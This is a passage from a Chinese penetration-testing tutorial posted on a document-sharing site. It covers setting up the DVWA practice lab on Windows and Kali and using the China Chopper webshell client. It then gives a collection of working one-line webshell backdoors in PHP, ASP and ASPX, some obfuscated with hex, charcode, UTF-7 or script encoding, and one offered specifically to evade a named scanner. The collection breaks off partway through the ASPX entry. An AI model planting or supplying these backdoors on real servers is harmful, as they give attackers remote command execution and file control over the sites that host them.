版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
第一章滲透必備基礎(chǔ)技術(shù)第一節(jié)搭建DVWA滲透測試平臺第二節(jié)一句話后門利用及操作
第一節(jié)搭建DVWA滲透測試平臺
1.1.1Windows下搭建DVWA滲透測試平臺1.準(zhǔn)備工作1)下載DVWA2)下載phpstudy2.安裝軟件(1)安裝phpstudy。(2)將DVWA解壓縮后的文件復(fù)制到phpstudy安裝時指定的WWW文件夾下。(3)設(shè)置php.ini參數(shù)。運(yùn)行phpstudy后,根據(jù)操作系統(tǒng)平臺來選擇不同的架構(gòu),如圖1-1所示,安裝完成后到程序安裝目錄下找到php.ini文件,將參數(shù)由“allow_url_include?=?Off”修改為“allow_url_include=On”,這樣方便測試本地文件包含漏洞,保存后重啟Apache服務(wù)器。(4)修改DVWA數(shù)據(jù)庫配置文件。將“C:\phpstudy\WWW\dvwa\config\config.inc.php.dist”文件重命名為“config.inc.php”文件,修改其中的數(shù)據(jù)庫配置為實際對應(yīng)的值,在本例中MySQL數(shù)據(jù)庫root密碼為root,因此修改值如下:$_DVWA['db_server']='';$_DVWA['db_database']='dvwa';$_DVWA['db_user']='root';$_DVWA['db_password']='root';3.安裝數(shù)據(jù)庫并測試在運(yùn)行中輸入“cmd”→“ipconfig”命令獲取本機(jī)IP地址,本例中使用地址http://30/dvwa/setup.php。安裝DVWA,也可以使用localhost/dvwa/setup.php安裝,如圖1-2所示,根據(jù)提示操作即可完成安裝。安裝成功后,系統(tǒng)會自動跳轉(zhuǎn)到30/dvwa/login.php登錄頁面,默認(rèn)登錄賬號和密碼為admin/password。登錄系統(tǒng)后,需要設(shè)置“DVWASecurity”安全等級,然后進(jìn)行漏洞測試,如圖1-3所示。最后選擇對應(yīng)級別分別為1、2、3、4提交后即可。1.1.2在Kali2016上安裝DVWA滲透測試平臺最新版的Kali(2017.2)安裝DVWA有一些問題,其默認(rèn)php版本為php7.0,對DVWA環(huán)境不太匹配,但與Kali2016可以比較完美地結(jié)合。下面介紹如何使用Kali2016版本進(jìn)行DVWA的安裝。1.下載KaliLinux2.0如果有時間可以自己先安裝虛擬機(jī),然后再安裝KaliLinux2.0系統(tǒng),對于這個過程已經(jīng)很熟練的用戶,現(xiàn)成可用的虛擬機(jī)絕對是一個不錯的選擇。KaliLinux2.0目前在其官方網(wǎng)站上已經(jīng)不能下載了,但可以通過btdig網(wǎng)站搜索來進(jìn)行下載.2.下載DVWA最新版本3.平臺搭建(1)?apache2停止服務(wù):serviceapache2stop(2)賦予dvwa文件夾相應(yīng)的權(quán)限:chmod-R755/var/www/html/dvwa(3)開啟MySQL:servicemysqlstartmysql-urootusemysqlcreatedatabasedvwa;exit在Kali中創(chuàng)建DVWA數(shù)據(jù)庫,如圖1-4所示。(4)配置php-gd模塊支持:apt-getinstallphp7.0-gd(5)修改php.ini參數(shù)值allow_url_include。編輯?/etc/php/7.0/apache2/php.ini文件,修改812行“allow_url_include=Off”為“allow_url_include=On”,保存后退出。Vim編輯技巧:在鍵盤上使用Esc功能鍵后,輸入“:”,然后輸入“wq!”保存修改并退出Vim。(6)配置DVWA。打開終端,輸入以下命令,進(jìn)入到dvwa文件夾,配置uploads文件夾和phpids_log.txt可讀可寫可執(zhí)行權(quán)限。cd/var/www/html/dvwachown-R777www-data:www-data/var/www/html/dvwa/hackable/uploadschownwww-data:www-datachown-R777/var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt(7)生成配置文件config.inc.php:cp/var/www/html/dvwa/config/config.inc.php.dist/var/www/html/dvwa/config/config.inc.phpvim/var/www/html/dvwa/config/config.inc.php修改第18行中“db_password='p@ssw0rd'”為實際的密碼值,在本例中設(shè)置為空,如圖1-5所示。4.訪問并創(chuàng)建DVWA平臺打開瀏覽器輸入32/dvwa/setup.php。如圖1-6所示,除了Google的驗證碼是Missing外,其他均為Enabled。單擊創(chuàng)建(Create/ResetDatabase),即可完成所有的配置。1.1.3在Kali2017上安裝DVWA滲透測試平臺最新版的Kali安裝DVWA有一些問題,研究發(fā)現(xiàn),KaliLinux最新版本也可以使用DVWA,其前面出現(xiàn)無法使用是由于MySQL授權(quán)問題,按照本節(jié)介紹的方法即可解決。1.安裝之前的準(zhǔn)備工作(1)下載KaliLinux最新版本。(2)下載DVWA最新版本。2.重新配置和安裝php-gd(1)安裝php-gd庫:aptinstallphp-gd(2)查看php版本。php-v執(zhí)行后顯示結(jié)果如下:PHP7.0.22-3(cli)(built:Aug23201705:51:41)(NTS)Copyright(c)1997-2017ThePHPGroupZendEnginev3.0.0,Copyright(c)1998-2017ZendTechnologieswithZendOPcachev7.0.22-3,Copyright(c)1999-2017,byZendTechnologies(3)下載并將DVWA復(fù)制到網(wǎng)站目錄:gitclone/ethicalhack3r/DVWA.gitmvDVWA/var/www/html/dvwa(4)修改/etc/php/7.0/apache2/php.ini文件,設(shè)置allow_url_include=On,初始設(shè)置其值為Off。賦予dvwa文件夾相應(yīng)的權(quán)限,接著在終端中輸入:chmod-R755/var/www/html/dvwachmod-R777/var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txtchmod-R777/var/www/html/dvwa/hackable/uploads(5)更改數(shù)據(jù)庫密碼和授權(quán)。登錄MySQL數(shù)據(jù)庫后執(zhí)行命令:updateusersetpassword=password('12345678')whereuser='root'andhost='localhost';grantallprivilegeson*.*toroot@localhostidentifiedby'12345678';(6)修改數(shù)據(jù)庫配置文件密碼。cd/var/www/html/dvwa/configcpconfig.inc.php.distconfig.inc.php修改config.inc.php中的數(shù)據(jù)庫配置為實際配置即可。(7)啟動Apache2以及MySQL服務(wù):serviceapache2restartservicemysqlrestart(8)通過瀏覽器對訪問DVWA網(wǎng)站并進(jìn)行相應(yīng)設(shè)置。
第二節(jié)一句話后門利用及操作
1.2.1中國菜刀使用及管理1.執(zhí)行中國菜刀中國菜刀的英文名為“Chopper”,可以到官方網(wǎng)站進(jìn)行下載,解壓縮后直接運(yùn)行chopper.exe即可,如圖1-7所示。2.添加Webshell在中國菜刀中單擊右鍵,在彈出的菜單中選擇“添加”命令,即可添加Webshell地址,如圖1-8所示。在地址中輸入一句話木馬Webshell地址,地址后面是一句話木馬的連接密碼,在配置中選擇腳本類型,程序會自動識別腳本類型,最后單擊“添加”按鈕即可添加一個Webshell地址。對于存在文件解析漏洞的網(wǎng)站W(wǎng)ebshell地址,需要手動設(shè)置腳本類型,例如1.asp;1.html等格式文件,可以確定腳本是ASP語言,其他語言類似。3.連接一句話后門回到中國菜刀主界面,雙擊剛才添加的Webshell地址,即可連接一句話后門,如圖1-9所示。如果后門執(zhí)行成功,則會顯示該網(wǎng)站的目錄結(jié)構(gòu)和詳細(xì)文件等信息。4.執(zhí)行文件操作通過中國菜刀客戶端可以方便地對文件及文件夾等進(jìn)行操作,如上傳文件、下載文件、編輯、刪除、復(fù)制、重命名、修改文件(夾)時間、新建和Access管理等,如圖1-10所示。在中國菜刀中還可以對數(shù)據(jù)庫進(jìn)行管理,通過配置數(shù)據(jù)庫用戶名和用戶密碼等參數(shù)即可對數(shù)據(jù)庫進(jìn)行相應(yīng)操作。1.2.2有關(guān)一句話后門的收集與整理1.php非一句話經(jīng)典后門php運(yùn)行時如果遇見字符“?`?”(鍵盤上?~?符號的下?lián)蹑I)總會嘗試著執(zhí)行“`”里面包含的命令,并返回命令執(zhí)行的結(jié)果(string類型)。其局限性在于特征碼比較明顯,“`”符號在php中很少用到,殺毒軟件很容易以此為特征碼掃描到并發(fā)出警報,而且“``”里面不能執(zhí)行php代碼。將以下代碼保存為test.php:<?phpecho`$_REQUEST[id]`;?>執(zhí)行代碼test.php?id=dirc:/,即可查看C盤文件,id后的參數(shù)可以直接執(zhí)行命令。2.加密的asp一句話后門將以下代碼保存為asp文件,或者將以下代碼插入到asp文件中,然后通過“黑狐專用一句話木馬加強(qiáng)版”進(jìn)行連接,其密碼為“#”,執(zhí)行效果如圖1-11所示。<scriptlanguage=vbsrunat=server>Execute(HextoStr("65786563757465287265717565737428636872283335292929"))FunctionHextoStr(data)HextoStr="EXECUTE"""""C="&CHR(&H"N=")"DoWhileLen(data)>1IfIsNumeric(Left(data,1))ThenHextoStr=HextoStr&C&Left(data,2)&Ndata=Mid(data,3)ElseHextoStr=HextoStr&C&Left(data,4)&Ndata=Mid(data,5)EndIfLoopEndFunction</script><SCRIPTRUNAT=SERVERLANGUAGE=JAVASCRIPT>eval(String.fromCharCode(116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>3.新型ASP一句話后門<%Seto=Server.CreateObject("ScriptControl")o.language="vbscript"o.addcode(Request("cmd"))%>4.常見的asp一句話后門收集asp一句話木馬:<%%25Execute(request("a"))%%25><%Execute(request("a"))%>%><%executerequest("a")%><%<scriptlanguage=VBScriptrunat=server>executerequest("a")</script><%25Execute(request("a"))%25>%><%executerequest("yy")%><%executerequest(char(97))%><%evalrequest(char(97))%>":executerequest("value"):a="<scriptlanguage=VBScriptrunat=server>ifrequest(chr(35))<>""""thenExecuteGlobalrequest(chr(35))</script>在access數(shù)據(jù)庫中插入的一句話木馬:┼攠數(shù)畣整爠煥敵瑳∨∣┩愾┼癥污爠煥敵瑳∨≡┩>密碼為:autf-7的馬:<%@codepage=65000%><%response.Charset="936"%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>ScriptEncoder加密:<%@LANGUAGE=VBScript.Encode%><%#@~^PgAAAA==r6P.;!+/D`14Dv&X#*@!@*ErPPD4+P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb?*?oBMAAA==^#~@%>可以躲過雷客圖的一句話:<%setms=server.CreateObject("MSScriptControl.ScriptControl.1")ms.Language="VBScript"ms.AddObject"Response",Responsems.AddObject"request",requestms.ExecuteStatement("ev"&"al(request(""1""))")%>php一句話:<?phpeval($_POST[cmd]);?><?php@eval($_POST[cmd]);?><?phpsystem($_REQUEST['cmd']);?><?phpeval($_POST[1]);?>aspx一句話:<scriptlanguage="C#"runat="server">WebAdmi
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025租房協(xié)議書合同簡易版
- 洛陽文化旅游職業(yè)學(xué)院《航空攝影》2023-2024學(xué)年第一學(xué)期期末試卷
- 2024年度商鋪物業(yè)管理及環(huán)境維護(hù)服務(wù)協(xié)議3篇
- 2024全新專業(yè)醫(yī)療護(hù)理機(jī)構(gòu)護(hù)工雇傭合同樣本下載3篇
- 退休設(shè)計師返聘協(xié)議范例
- 動物園水地暖施工合同
- 2024年度高端智能家居紗窗定制服務(wù)合同3篇
- 公園管理處聘用合同樣本
- 聯(lián)營項目管理質(zhì)量保證
- 化肥廠地磅租賃協(xié)議
- 02565+24273中醫(yī)藥學(xué)概論
- 【MOOC】市場調(diào)查與研究-南京郵電大學(xué) 中國大學(xué)慕課MOOC答案
- 2023年中央紀(jì)委國家監(jiān)委機(jī)關(guān)直屬單位招聘工作人員考試真題
- 2024-2025學(xué)年度教科版初中物理八年級上冊期末模擬卷(含答案)
- 《旅游概論》考試復(fù)習(xí)題庫(附答案)
- 1000畝水產(chǎn)養(yǎng)殖建設(shè)項目可行性研究報告
- 24秋國家開放大學(xué)《0-3歲嬰幼兒的保育與教育》期末大作業(yè)參考答案
- 防范工貿(mào)行業(yè)典型事故三十條措施解讀
- 冀人版五年級科學(xué)上冊期末測試卷4份(含答案)
- 人工智能智慧樹知到期末考試答案章節(jié)答案2024年復(fù)旦大學(xué)
- (高清版)JTGT D81-2017 公路交通安全設(shè)施設(shè)計細(xì)則
評論
0/150
提交評論